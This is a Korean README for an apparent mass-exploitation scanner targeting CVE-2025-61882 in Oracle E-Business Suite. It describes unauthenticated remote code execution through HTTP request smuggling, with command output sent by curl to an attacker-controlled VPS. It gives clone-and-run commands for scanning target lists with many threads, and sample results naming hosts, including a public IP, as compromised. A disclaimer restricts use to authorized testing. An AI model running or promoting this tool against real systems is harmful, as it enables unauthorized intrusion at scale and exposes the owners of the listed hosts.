
# CVE-2025-61882 멀티스레드 스캐너 Oracle E-Business Suite의 CVE-2025-61882를 위한 멀티스레드 스캐너로, HTTP 요청 스머글링을 악용하여 인증 없이 원격 코드 실행을 달성하고 명령 출력을 통해 검증합니다.
Oracle E-Business Suite 설치 환경에서 CVE-2025-61882를 탐지하는 빠르고 멀티스레드 기반 대량 스캐너입니다. 이 치명적인 취약점은 인증 없이 원격 코드 실행을 허용합니다.
id 명령 실행 및 출력 파싱을 통해 RCE 검증vuln-output.txt에 즉시 기록pip install requests
이것뿐입니다. Python 3.7+ 및 requests 라이브러리만 있으면 됩니다.
git clone https://github.com/Sachinart/CVE-2025-61882.git
cd CVE-2025-61882
pip install -r requirements.txt
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 50
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 10
각 줄에 URL 하나씩 포함된 targets.txt 파일을 생성하세요:
http://oracle-ebs1.example.com:8000
https://oracle-ebs2.example.com:443
http://192.168.1.100:8001
https://apps.company.com
╔═══════════════════════════════════════════════════════════════╗
║ Oracle E-Business Suite RCE Scanner (CVE-2025-61882) ║
╚═══════════════════════════════════════════════════════════════╝
[*] Loaded 1235 targets from file
[*] Running with 20 concurrent threads
[*] Vulnerable hosts will be saved to vuln-output.txt
[*] [1/1235] Checking https://target1.com:443 on port 7893
[*] [2/1235] Checking https://target2.com:443 on port 5882
[+] Got one! 129.146.56.43 is vulnerable
[+] Command output: uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
=================================================================
[*] Scan finished in 245.67 seconds
[*] Found 3 vulnerable target(s)
[*] Check vuln-output.txt for full results
=================================================================
[+] Vulnerable targets found:
129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
10.0.0.100 → uid=500(oracle) gid=500(oinstall)
결과는 vuln-output.txt에 저장됩니다:
# Oracle EBS CVE-2025-61882 - Scan Results
# Started: Tue Oct 07 15:30:45 2025
# Total targets: 1235
# Scanner by: Chirag Artani
129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)
id 명령을 실행하고 curl을 통해 출력을 전송uid=...gid=... 패턴 확인을 통해 RCE 성공 여부 검증이 도구는 승인된 보안 테스트 전용입니다. 항상:
승인되지 않은 컴퓨터 시스템 접근은 불법입니다.
버그를 발견하셨나요? 기능 요청이 있으신가요?
git checkout -b feature/amazing-feature)git commit -m 'Add some feature')git push origin feature/amazing-feature)이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다 - 자세한 내용은 LICENSE 파일을 참조하세요.
이 도구는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다. 작성자는 이 도구로 인해 발생하는 오용이나 손해에 대해 책임을 지지 않습니다. 사용에 따른 책임은 본인에게 있습니다.
| 인자 | 필수 | 기본값 | 설명 |
|---|
--targets | 예 | - | 대상 URL이 포함된 파일 경로 |
--lhost | 예 | - | VPS/공격자 IP 주소 |
--threads | 아니요 | 20 | 동시 스레드 수 |